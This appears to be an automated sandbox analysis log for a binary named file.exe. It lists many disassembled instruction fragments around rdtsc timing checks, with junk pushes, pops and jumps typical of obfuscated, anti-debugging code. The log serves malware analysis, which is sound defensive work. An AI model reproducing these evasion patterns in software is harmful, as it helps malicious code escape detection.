Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40913 second address: 4C4093A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB1DD323678h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4093A second address: 4C4093E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C4093E second address: 4C40944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40944 second address: 4C40982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB1DCC289E0h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB1DCC289E7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40982 second address: 4C409E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 call 00007FB1DD32366Bh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e and esp, FFFFFFF8h 0x00000011 jmp 00007FB1DD32366Fh 0x00000016 xchg eax, ebx 0x00000017 pushad 0x00000018 mov al, D7h 0x0000001a mov dx, 12B4h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FB1DD32366Ah 0x00000025 xchg eax, ebx 0x00000026 jmp 00007FB1DD323670h 0x0000002b xchg eax, esi 0x0000002c pushad 0x0000002d pushad 0x0000002e mov edx, esi 0x00000030 movzx esi, dx 0x00000033 popad 0x00000034 mov dl, 93h 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FB1DD32366Ah 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C409E6 second address: 4C40A12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FB1DCC289E6h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40A12 second address: 4C40A5B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub ebx, ebx 0x00000009 jmp 00007FB1DD323671h 0x0000000e test esi, esi 0x00000010 jmp 00007FB1DD32366Eh 0x00000015 je 00007FB24F5F8FB8h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB1DD323677h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40A5B second address: 4C40AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DCC289DFh 0x00000009 add si, 192Eh 0x0000000e jmp 00007FB1DCC289E9h 0x00000013 popfd 0x00000014 jmp 00007FB1DCC289E0h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov si, 5443h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40AAE second address: 4C40AD3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB1DD323674h 0x0000000b popad 0x0000000c mov ecx, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bl, 59h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40AD3 second address: 4C40B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dl 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FB24EEFE29Ch 0x00000010 jmp 00007FB1DCC289E8h 0x00000015 test byte ptr [76FA6968h], 00000002h 0x0000001c jmp 00007FB1DCC289E0h 0x00000021 jne 00007FB24EEFE27Ah 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FB1DCC289E7h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B31 second address: 4C40B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB1DD32366Fh 0x00000009 adc eax, 00BEE4BEh 0x0000000f jmp 00007FB1DD323679h 0x00000014 popfd 0x00000015 mov si, CA07h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov edx, dword ptr [ebp+0Ch] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FB1DD323679h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B89 second address: 4C40B8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40B8F second address: 4C40BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FB1DD323676h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40BC6 second address: 4C40BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40BCA second address: 4C40BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40BCE second address: 4C40BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40BD4 second address: 4C40BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0B7D51A8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FB1DD32366Ah 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 call 00007FB1DD32366Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40BFC second address: 4C40C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 mov cl, CFh 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b jmp 00007FB1DCC289DFh 0x00000010 xchg eax, ebx 0x00000011 jmp 00007FB1DCC289E6h 0x00000016 push dword ptr [ebp+14h] 0x00000019 jmp 00007FB1DCC289E0h 0x0000001e push dword ptr [ebp+10h] 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB1DCC289DEh 0x00000028 and cl, FFFFFFF8h 0x0000002b jmp 00007FB1DCC289DBh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007FB1DCC289E6h 0x00000039 jmp 00007FB1DCC289E5h 0x0000003e popfd 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40CDC second address: 4C40CF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323671h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40CF8 second address: 4C40CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40CFC second address: 4C40D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D00 second address: 4C40D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D06 second address: 4C40D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D0C second address: 4C40D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D10 second address: 4C40D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx ebx, cx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D21 second address: 4C40D50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB1DCC289E5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C40D50 second address: 4C40D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD32366Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DEF second address: 4C50DF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DF5 second address: 4C50DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50DF9 second address: 4C50E18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1DCC289E4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50E18 second address: 4C50E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD32366Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50A4E second address: 4C50AB5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB1DCC289E8h 0x00000008 and esi, 72DAAE18h 0x0000000e jmp 00007FB1DCC289DBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FB1DCC289E8h 0x0000001c xor ax, 1878h 0x00000021 jmp 00007FB1DCC289DBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bx, si 0x0000002f mov ecx, 5C5511FDh 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50AB5 second address: 4C50B18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 098CC3ECh 0x00000008 pushfd 0x00000009 jmp 00007FB1DD323675h 0x0000000e or esi, 7C7FBBC6h 0x00000014 jmp 00007FB1DD323671h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e jmp 00007FB1DD32366Eh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FB1DD323677h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50B18 second address: 4C50B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0B4E second address: 4CD0B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD323677h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD001B second address: 4CD00A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, 38E3h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FB1DCC289E6h 0x00000016 and cx, B528h 0x0000001b jmp 00007FB1DCC289DBh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FB1DCC289E8h 0x00000027 xor esi, 75EDE788h 0x0000002d jmp 00007FB1DCC289DBh 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 push eax 0x00000036 pushad 0x00000037 call 00007FB1DCC289DFh 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD00A7 second address: 4CD00BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1DD32366Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DA4 second address: 4CC0DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DAA second address: 4CC0DCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB1DD323675h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DCA second address: 4CC0DD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0DD0 second address: 4CC0E1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB1DD32366Bh 0x00000017 sbb si, 2E9Eh 0x0000001c jmp 00007FB1DD323679h 0x00000021 popfd 0x00000022 mov edi, esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0E1D second address: 4CC0E39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DCC289E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CC0E39 second address: 4CC0E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD32366Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FB1DD323676h 0x00000012 pop ebp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FB1DD32366Eh 0x0000001a xor ch, 00000058h 0x0000001d jmp 00007FB1DD32366Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov eax, 42F11CA5h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD025A second address: 4CD0288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DCC289DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB1DCC289E6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0288 second address: 4CD028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD028E second address: 4CD0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0390 second address: 4CD03A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD323675h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03A9 second address: 4CD03AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03AD second address: 4CD03CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1DD323673h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03CE second address: 4CD03D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03D4 second address: 4CD03D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD03D8 second address: 4CD03E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ebx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7047D second address: 4C70483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70483 second address: 4C70553 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 pushfd 0x00000006 jmp 00007FB1DCC289E6h 0x0000000b or ecx, 41ED7368h 0x00000011 jmp 00007FB1DCC289DBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FB1DCC289E6h 0x00000020 push eax 0x00000021 pushad 0x00000022 jmp 00007FB1DCC289E1h 0x00000027 pushfd 0x00000028 jmp 00007FB1DCC289E0h 0x0000002d sbb cx, C828h 0x00000032 jmp 00007FB1DCC289DBh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a jmp 00007FB1DCC289E6h 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 mov edx, ecx 0x00000044 pushfd 0x00000045 jmp 00007FB1DCC289DAh 0x0000004a add ax, 95B8h 0x0000004f jmp 00007FB1DCC289DBh 0x00000054 popfd 0x00000055 popad 0x00000056 push FFFFFFFEh 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FB1DCC289E5h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70553 second address: 4C70563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD32366Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70563 second address: 4C705A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FB1DCC289D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push esi 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007FB1DCC289E4h 0x00000018 sbb eax, 5C97B1A8h 0x0000001e jmp 00007FB1DCC289DBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705A1 second address: 4C705A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705A7 second address: 4C705AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705AB second address: 4C705AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705AF second address: 4C705D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB1DCC289E8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705D4 second address: 4C705D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705D8 second address: 4C705DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C705DE second address: 4C70648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB1DD32366Ch 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FB1DD32366Bh 0x0000000f or ah, FFFFFFFEh 0x00000012 jmp 00007FB1DD323679h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FB1DD323679h 0x00000028 jmp 00007FB1DD32366Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70648 second address: 4C70660 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DCC289E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70660 second address: 4C70682 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FB1DD32366Eh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70682 second address: 4C70686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70686 second address: 4C7068A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7068A second address: 4C70690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70690 second address: 4C706A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB1DD323672h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706A6 second address: 4C706AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706AA second address: 4C706E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007FB1DD323677h 0x0000000e call 00007FB1DD323669h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB1DD323670h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706E7 second address: 4C706EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706EB second address: 4C706F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706F1 second address: 4C706F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C706F7 second address: 4C70726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323678h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB1DD32366Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70726 second address: 4C70745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB1DCC289DFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70745 second address: 4C70784 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB1DD323679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c mov dx, EA12h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB1DD323679h 0x00000017 rdtsc
